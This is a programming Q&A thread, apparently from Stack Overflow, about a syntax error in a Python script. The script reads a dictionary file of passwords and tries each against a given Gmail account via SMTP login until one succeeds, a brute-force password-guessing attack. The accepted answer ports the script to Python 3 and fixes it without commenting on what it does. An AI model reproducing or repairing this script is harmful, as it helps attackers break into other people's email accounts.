# I keep getting an invalid syntax error on this python code I'm trying to write. The error is on line 15 right after "\n\n\n login

Tags: python

I keep getting an invalid syntax error on this python code I'm trying to write. The error is on line 15 right after `"\n\n\n loggin`

```
#!/usr/bin
import smtplib
file_name=raw_input("Enter name of your dictionary: ")
username=raw_input("Enter email id: ")
f=open(file_name,"r")
for name in f:
        try:
            session = smtplib.SMTP('smtp.gmail.com',587)
            session.starttls()
            session.ehlo
            b = session.login(username,name[:-1])
        except smtplib.SMTPAuthenticationError:
            continue
        else:
            print "\n\n\n loggin "+" - password ---->>> "+name[:-1]+"\n\n\n\n\n"
            break
```

Comment: And what is the exact error you are getting? Please copy and paste it here, then format it as you would format code.

Comment: Are you using Python 3? Is that your actual shebang on line 1?

Comment: @Wooble: He must be using Python2, since there is no `raw_input` in Python3.

Comment: @unutbu: syntax is checked before a NameError would get thrown.

Answer (score 0, accepted):

Try this, since it looks like your issue is a Python version issue. Looks like you're trying to run Python 2 code using Python 3.

```
#!/usr/bin
import smtplib
file_name=input("Enter name of your dictionary: ")
username=input("Enter email id: ")
with open(file_name,"r") as f:
    for name in f:
        try:
            session = smtplib.SMTP('smtp.gmail.com',587)
            session.starttls()
            session.ehlo
            b = session.login(username,name[:-1])
        except smtplib.SMTPAuthenticationError:
            continue
        else:
            print("\n\n\n loggin "+" - password ---->>> "+name[:-1]+"\n\n\n\n\n")
            break
```

Changes:

1. `raw_input` to `input`.
2. Added `with` statement around file open. You didn't have a `close()` call.
3. Added parens around `print` to the print call.

That's as far as I can help without knowing the expected contents/format of the file you read.